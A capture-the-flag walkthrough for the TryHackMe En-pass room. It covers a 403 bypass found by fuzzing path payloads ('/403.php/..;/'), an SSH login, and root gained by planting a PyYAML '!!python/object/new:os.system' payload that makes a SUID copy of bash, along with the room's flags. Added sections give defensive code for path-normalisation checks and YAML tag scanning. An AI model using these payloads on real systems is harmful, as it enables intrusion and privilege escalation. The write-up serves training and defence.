Description:
Get what you can't.
Link: https://tryhackme.com/room/enpass

Hint: The path you get will forbid to see but you can bypass it.
The /reg.php page:
┌──(user㉿parrot)-[/data/En-pass/files]
└─$ curl -s http://10.10.67.150:8001/reg.php | tr -s '\n'
<!DOCTYPE html>
<html>
<head>
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <title>En-Pass</title>
    [REDACTED]
</head>
<body>
    <img src="sau.jpg" alt="sau">
    <h1>EN-PASS</h1>
    <div id="container">
        <form method="POST" action="/reg.php">
            <input type="text" id="title" name="title" placeholder="Input">
            <input type="submit" value="Submit">
            <h4 style='color:rgb(83, 21, 165);'> <?php
                if($_SERVER["REQUEST_METHOD"] == "POST"){
                    $title = $_POST["title"];
                    if (!preg_match('/[a-zA-Z0-9]/i' , $title )){
                        $val = explode(",",$title);
                        $sum = 0;
                        for($i = 0 ; $i < 9; $i++){
                            if ( (strlen($val[0]) == 2) and (strlen($val[8]) == 3 )) {
                                if ( $val[5] !=$val[8] and $val[3]!=$val[7] )
                                    $sum = $sum+ (bool)$val[$i]."<br>";
                            }
                        }
                        if ( ($sum) == 9 ){
                            echo $result;//do not worry you'll get what you need.
                            echo " Congo You Got It !! Nice ";
                        }
                        else{
                            echo " Try Try!!";
                        }
                    }
                    else{
                        echo " Try Again!! ";
                    }
                }
            ?>
            </h4>
        </form>
    </div>
</body>
</html>
At this point we have the passphrase for the SSH private key, but it does not work yet.
Only the 403.php page is left:
Let's try, proxying through Burp Suite:
┌──(user㉿parrot)-[/data/src/403fuzzer]
└─$ python3 403fuzzer.py -u http://10.10.67.150:8001/403.php -hc 403,404 --proxy http://localhost:8080
Sending header payloads...
Proxy flag was detected. Skipping trailing dot payload...
Sending URL payloads...
Response Code: 200 Length: 2563 Payload: /#403.php
Response Code: 200 Length: 2563 Payload: /#?403.php
Response Code: 400 Length: 306 Payload: /%2e%2e/403.php
Response Code: 200 Length: 2563 Payload: /#403.php
Response Code: 400 Length: 306 Payload: /%2e%2e/403.php
Response Code: 200 Length: 2563 Payload: /
Response Code: 200 Length: 2563 Payload: /
Response Code: 200 Length: 2563 Payload: /
Response Code: 200 Length: 2563 Payload: /403.php%3b/%2e.
Response Code: 200 Length: 2563 Payload: /403.php%3b/..
Response Code: 200 Length: 2563 Payload: /403.php/%2e%2e
Response Code: 200 Length: 2563 Payload: /403.php/%2e%2e/
Response Code: 200 Length: 2563 Payload: /403.php/..
Response Code: 200 Length: 2563 Payload: /403.php/../
Response Code: 200 Length: 2563 Payload: /403.php/../../
Response Code: 200 Length: 2563 Payload: /403.php/../../../
Response Code: 200 Length: 2563 Payload: /403.php/../../..//
Response Code: 200 Length: 2563 Payload: /403.php/../..//
Response Code: 200 Length: 2563 Payload: /403.php/../..//../
Response Code: 200 Length: 2563 Payload: /403.php/.././../
Response Code: 200 Length: 2563 Payload: /403.php/../.;/../
Response Code: 200 Length: 2563 Payload: /403.php/..//
Response Code: 200 Length: 2563 Payload: /403.php/..//../
Response Code: 200 Length: 2563 Payload: /403.php/..//../../
Response Code: 200 Length: 2563 Payload: /403.php/../;/../
Response Code: 200 Length: 917 Payload: /403.php/..;/ <------------------ interesting
Response Code: 200 Length: 917 Payload: /403.php/..;//../
Response Code: 200 Length: 2563 Payload: /403.php//../../
Response Code: 200 Length: 2563 Payload: /403.php;%2f%2f/../
Response Code: 200 Length: 2563 Payload: /403.php;%2f..%2f/../
Response Code: 200 Length: 2563 Payload: /403.php;/%2e%2e
Response Code: 200 Length: 2563 Payload: /403.php;/%2e%2e/
Response Code: 200 Length: 2563 Payload: /403.php;/%2e.
Response Code: 200 Length: 2563 Payload: /403.php;/.%2e
Response Code: 200 Length: 2563 Payload: /403.php;/..
Response Code: 200 Length: 2563 Payload: /403.php;/../
Response Code: 200 Length: 2563 Payload: /403.php;/../../
Response Code: 200 Length: 2563 Payload: /403.php;/../..//
Response Code: 200 Length: 2563 Payload: /403.php;/.././../
Response Code: 200 Length: 2563 Payload: /403.php;/../.;/../
Response Code: 200 Length: 2563 Payload: /403.php;/..//
Response Code: 400 Length: 306 Payload: /403.php;/..//%2e%2e/
Response Code: 200 Length: 2563 Payload: /403.php;/..//../
Response Code: 200 Length: 2563 Payload: /403.php;/..///
Response Code: 200 Length: 2563 Payload: /403.php;/../;/../
Response Code: 200 Length: 2563 Payload: /403.php;/..
Response Code: 200 Length: 2563 Payload: /403.php;//../../
Response Code: 400 Length: 306 Payload: /;/..//%2e%2e/403.php
Response Code: 200 Length: 2563 Payload: /
Response Code: 200 Length: 2563 Payload: /#403.php
Response Code: 200 Length: 2563 Payload: /
Response Code: 200 Length: 2563 Payload: /
Response Code: 200 Length: 2563 Payload: /
Response Code: 200 Length: 2563 Payload: /
Response code: 200 Response length: 0 Sent OPTIONS method.
Response length was 0 so probably NOT worth checking out....
Response Headers:
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-Length: 0
The request that returned HTTP 200:
GET /403.php/..;/ HTTP/1.1
Host: 10.10.67.150:8001
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Which gives:
HTTP/1.1 200 OK
Date: Wed, 12 May 2021 17:07:56 GMT
Server: Apache/2.4.18 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 917
Connection: close
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>En-Pass</title>
[REDACTED]
<h3>Glad to see you here.Congo, you bypassed it. 'imsau' is waiting for you somewhere.</h3>
</body>
</html>
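The fuzzer output shows why the raw URL is the wrong thing to authorise. Apache only collapses genuine "." and ".." segments; "..;" is an ordinary name to it, so "/403.php/..;/" still dispatches 403.php (the 917-byte "you bypassed it" body) with the trailing part handed to the script as path info, while a deny rule matching the literal path "/403.php" never fires. The Python model below is added here and is not part of the room or the original writeup: it resolves paths the way that stack does, compares a raw-URL deny rule with a decision taken on the script that will actually run, and adds a log-side indicator function. The script list, the deny rule and the sample paths are constructed from the payload list above.

```python
import re
from urllib.parse import unquote

# Constructed for this example: scripts that exist in the web root and the
# one an access rule is meant to keep clients away from.
SCRIPTS = {"index.php", "reg.php", "403.php"}
FORBIDDEN = {"403.php"}

# A rule written against the raw request line (rewrite/deny on the literal URL).
# This is the shape of rule that "/403.php/..;/" walks around.
NAIVE_DENY = re.compile(r"^/403\.php$")


def resolve(raw_path):
    """Map a request path to (script, path_info) the way an Apache/PHP stack
    dispatches it: only '.' and '..' are dot-segments; '..;' is an ordinary
    name, so it survives normalisation and ends up in PATH_INFO instead of
    stepping up a directory. Returns ('', path) when no known script matches."""
    path = unquote(raw_path.split("?", 1)[0].split("#", 1)[0])
    segs = []
    for s in path.split("/"):
        if s in ("", "."):
            continue
        if s == "..":
            if segs:
                segs.pop()
            continue
        segs.append(s)
    if not segs:
        return "index.php", ""            # directory index
    for i, s in enumerate(segs):
        if s in SCRIPTS:
            rest = segs[i + 1:]
            info = "/" + "/".join(rest) if rest else ""
            return s, info
    return "", "/" + "/".join(segs)


def naive_allowed(raw_path):
    """Decision of the raw-URL rule."""
    return NAIVE_DENY.match(raw_path) is None


def resolved_allowed(raw_path):
    """Decision taken on the script that will actually run."""
    script, _ = resolve(raw_path)
    return script not in FORBIDDEN


def bypasses(raw_path):
    """True when the raw-URL rule passes a request that runs a forbidden script."""
    return naive_allowed(raw_path) and not resolved_allowed(raw_path)


def evasion_indicators(raw_path):
    """Cheap log-side indicators of path-normalisation games, in check order."""
    hits = []
    if ".." in raw_path:
        hits.append("dot-dot segment")
    if ";" in raw_path:
        hits.append("path parameter (;)")
    if "%2e" in raw_path.lower():
        hits.append("percent-encoded dot")
    if "#" in raw_path:
        hits.append("fragment sent to server")
    return hits


# Constructed sample, drawn from the fuzzer's payload list.
SAMPLE = ["/", "/403.php", "/403.php/../", "/403.php;/..", "/403.php/..;/",
          "/403.php/..;//../"]

if __name__ == "__main__":
    for p in SAMPLE:
        script, info = resolve(p)
        flag = "BYPASS" if bypasses(p) else ""
        print("%-20s -> script=%-10r path_info=%-8r %-6s %s"
              % (p, script, info, flag, evasion_indicators(p)))
```

The model reproduces what the fuzzer saw: "/403.php/../" and "/403.php;/.." normalise to the index (the 2563-byte responses), while the "..;" variants run 403.php and slip past the literal rule. It does not model Apache's own 400 for the "%2e%2e" climb-above-root payloads. The practical fix is to take the authorisation decision on the resolved resource (for Apache, a Files/FilesMatch directive on 403.php rather than a rule on the request URL) and to alert on the indicator strings in access logs.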
Now we have a username and a passphrase to log in:
┌──(user㉿parrot)-[/data/En-pass/files]
└─$ ssh -i key imsau@10.10.67.150
Enter passphrase for key 'key': cimihan_are_you_here?
$ cat user.txt
1c5ccb6ce6f3561e302e0e516c633da9
USER FLAG: 1c5ccb6ce6f3561e302e0e516c633da9
Running pspy64 reveals a cron job executed by root every minute:
2021/05/12 19:02:01 CMD: UID=0 PID=22837 | /bin/sh -c cd /opt/scripts && sudo /usr/bin/python /opt/scripts/file.py && sudo rm -f /tmp/file.yml
2021/05/12 19:02:01 CMD: UID=0 PID=22836 | /bin/sh -c cd /tmp && sudo chown root:root /tmp/file.yml
2021/05/12 19:02:01 CMD: UID=0 PID=22835 | /bin/sh -c cd /opt/scripts && sudo /usr/bin/python /opt/scripts/file.py && sudo rm -f /tmp/file.yml
2021/05/12 19:02:01 CMD: UID=0 PID=22834 | /bin/sh -c cd /tmp && sudo chown root:root /tmp/file.yml
2021/05/12 19:02:01 CMD: UID=0 PID=22833 | /usr/sbin/CRON -f
2021/05/12 19:02:01 CMD: UID=0 PID=22832 | /usr/sbin/CRON -f
2021/05/12 19:02:01 CMD: UID=0 PID=22838 | sudo chown root:root /tmp/file.yml
2021/05/12 19:02:01 CMD: UID=0 PID=22839 | sudo /usr/bin/python /opt/scripts/file.py
2021/05/12 19:02:05 CMD: UID=0 PID=22840 | ps -e -o pid,ppid,state,command
2021/05/12 19:03:01 CMD: UID=0 PID=22846 | /bin/sh -c cd /opt/scripts && sudo /usr/bin/python /opt/scripts/file.py && sudo rm -f /tmp/file.yml
2021/05/12 19:03:01 CMD: UID=0 PID=22845 | /bin/sh -c cd /tmp && sudo chown root:root /tmp/file.yml
2021/05/12 19:03:01 CMD: UID=0 PID=22844 | /bin/sh -c cd /opt/scripts && sudo /usr/bin/python /opt/scripts/file.py && sudo rm -f /tmp/file.yml
2021/05/12 19:03:01 CMD: UID=0 PID=22843 | /bin/sh -c cd /tmp && sudo chown root:root /tmp/file.yml
2021/05/12 19:03:01 CMD: UID=0 PID=22842 | /usr/sbin/CRON -f
2021/05/12 19:03:01 CMD: UID=0 PID=22841 | /usr/sbin/CRON -f
2021/05/12 19:03:01 CMD: UID=0 PID=22847 | sudo chown root:root /tmp/file.yml
2021/05/12 19:03:01 CMD: UID=0 PID=22848 | sudo /usr/bin/python /opt/scripts/file.py
2021/05/12 19:03:07 CMD: UID=0 PID=22849 | ps -e -o pid,ppid,state,command
The cron job runs the following Python script with sudo and then removes the /tmp/file.yml file:
imsau@enpass:/opt/scripts$ cat file.py
#!/usr/bin/python
import yaml

class Execute():
    def __init__(self, file_name="/tmp/file.yml"):
        self.file_name = file_name
        # /tmp is world-writable, so any local user decides what this file contains
        self.read_file = open(file_name, "r")

    def run(self):
        return self.read_file.read()

# No Loader argument: on this old PyYAML that means the full Loader, which
# honours !!python/* tags and can instantiate arbitrary objects from the file
data = yaml.load(Execute().run())
We do not have write access to the script, but searching for exploits affecting the imported yaml library leads to this issue.
$ cp `which bash` /tmp/bash
$ cat > /tmp/file.yml << EOF
!!python/object/new:os.system ["chown root /tmp/bash;chmod u+s /tmp/bash"]
EOF
After a minute, we have a root shell:
imsau@enpass:/tmp$ ./bash -p
bash-4.3# cat /root/root.txt
5d45f08ee939521d59247233d3f8faf
ROOT FLAG: 5d45f08ee939521d59247233d3f8faf
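Two things go wrong in the cron job above: root processes a file that lives in world-writable /tmp, and file.py calls yaml.load() without a Loader, which on old PyYAML selects the full Loader and lets a "!!python/object/new:" tag call any callable the document names. The Python below is added here and is not part of the room or the original writeup; it is the defender's counterpart to the exploit: a tag scanner that rejects such documents before parsing, followed by yaml.safe_load, whose SafeLoader has no constructor for python tags and raises ConstructorError on them. The YAML documents are constructed; MALICIOUS reproduces the tag line planted above, and PyYAML is imported lazily so the scanner runs even where the library is absent.

```python
import re

# PyYAML's language-specific tags, in both short and verbatim form.
# SafeLoader cannot construct any of them; the full Loader executes them.
PYTHON_TAG = re.compile(r"!!python/|!<tag:yaml\.org,2002:python/")


def dangerous_tags(text):
    """Return (line number, tag token) for every python/* tag in the document."""
    hits = []
    for n, line in enumerate(text.splitlines(), 1):
        for m in PYTHON_TAG.finditer(line):
            tag = line[m.start():].split()[0]   # the whole tag token
            hits.append((n, tag))
    return hits


def load_untrusted(text):
    """Load YAML written by someone we do not trust: refuse python tags up
    front, then parse with safe_load, which only builds scalars, lists and dicts."""
    hits = dangerous_tags(text)
    if hits:
        raise ValueError("refusing YAML with code-executing tags: %r" % hits)
    import yaml  # PyYAML; deferred so the scanner itself has no dependency
    return yaml.safe_load(text)


def accepts(text):
    """True when the document passes the tag scan (and safe_load, if PyYAML is installed)."""
    if dangerous_tags(text):
        return False
    try:
        import yaml
    except ImportError:
        return True                      # scanner only in this environment
    try:
        yaml.safe_load(text)
        return True
    except yaml.YAMLError:
        return False


# Constructed: the exact document the writeup drops into /tmp/file.yml, and a benign one.
MALICIOUS = '!!python/object/new:os.system ["chown root /tmp/bash;chmod u+s /tmp/bash"]\n'
BENIGN = "name: enpass\nports: [22, 8001]\n"

if __name__ == "__main__":
    for name, doc in (("BENIGN", BENIGN), ("MALICIOUS", MALICIOUS)):
        print(name, "accepted" if accepts(doc) else "rejected", dangerous_tags(doc))
    try:
        import yaml
        try:
            yaml.safe_load(MALICIOUS)
        except yaml.constructor.ConstructorError as e:
            print("safe_load refused it:", str(e).splitlines()[0])
    except ImportError:
        print("PyYAML not installed; scanner-only run")
```

Using safe_load (or yaml.load(text, Loader=yaml.SafeLoader)) is the one-line fix for file.py, but it does not repair the design: a root job should never read its input from a path another user can create, so the file belongs in a root-owned directory with the chown step dropped rather than in /tmp.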
IN SUMMARY:
